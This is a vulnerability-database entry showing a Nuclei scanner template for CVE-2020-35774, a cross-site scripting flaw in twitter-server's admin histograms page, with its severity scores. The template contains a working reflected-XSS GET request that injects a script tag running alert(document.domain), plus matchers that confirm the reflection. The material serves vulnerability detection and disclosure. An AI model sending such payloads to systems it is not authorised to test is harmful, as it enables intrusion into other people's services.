Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2020-35774
HistoryJul 27, 2021 - 3:31 a.m.

twitter-server Cross-Site Scripting

2021-07-2703:31:48
ProjectDiscovery
github.com
5
twitter-server
cross-site scripting
histograms

CVSS2

3.5

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

SINGLE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:S/C:N/I:P/A:N

CVSS3

5.4

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

EPSS

0.969

Percentile

99.7%

twitter-server before 20.12.0 is vulnerable to cross-site scripting in some configurations. The vulnerability exists in the administration panel of twitter-server in the histograms component via server/handler/HistogramQueryHandler.scala.
id: CVE-2020-35774

info:
  name: twitter-server Cross-Site Scripting
  author: pikpikcu
  severity: medium
  description: |
    twitter-server before 20.12.0 is vulnerable to cross-site scripting in some configurations. The vulnerability exists in the administration panel of twitter-server in the histograms component via server/handler/HistogramQueryHandler.scala.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, data theft, or defacement.
  remediation: |
    Apply the latest security patches or updates provided by Twitter to mitigate the XSS vulnerability.
  reference:
    - https://advisory.checkmarx.net/advisory/CX-2020-4287
    - https://nvd.nist.gov/vuln/detail/CVE-2020-35774
    - https://github.com/twitter/twitter-server/commit/e0aeb87e89a6e6c711214ee2de0dd9f6e5f9cb6c
    - https://github.com/twitter/twitter-server/compare/twitter-server-20.10.0...twitter-server-20.12.0
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cve-id: CVE-2020-35774
    cwe-id: CWE-79
    epss-score: 0.97225
    epss-percentile: 0.99823
    cpe: cpe:2.3:a:twitter:twitter-server:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: twitter
    product: twitter-server
  tags: cve2020,cve,xss,twitter-server,twitter

http:
  - method: GET
    path:
      - "{{BaseURL}}/admin/histograms?h=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&fmt=plot_cdf&log_scale=true"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '</script><script>alert(document.domain)</script>'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 490a00463044022059aae75a1ba54ffd46128637519495af796f1bf598fe025a5dc99ae09ecfae6102202090450bd8a9fbf4c8c2099543cfa0f00fd5e78700e8995ad0f87ddf92e69c62:922c64590222798bb761d5b6d8e72950

CVSS2

3.5

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

SINGLE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:S/C:N/I:P/A:N

CVSS3

5.4

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

EPSS

0.969

Percentile

99.7%

Related for NUCLEI:CVE-2020-35774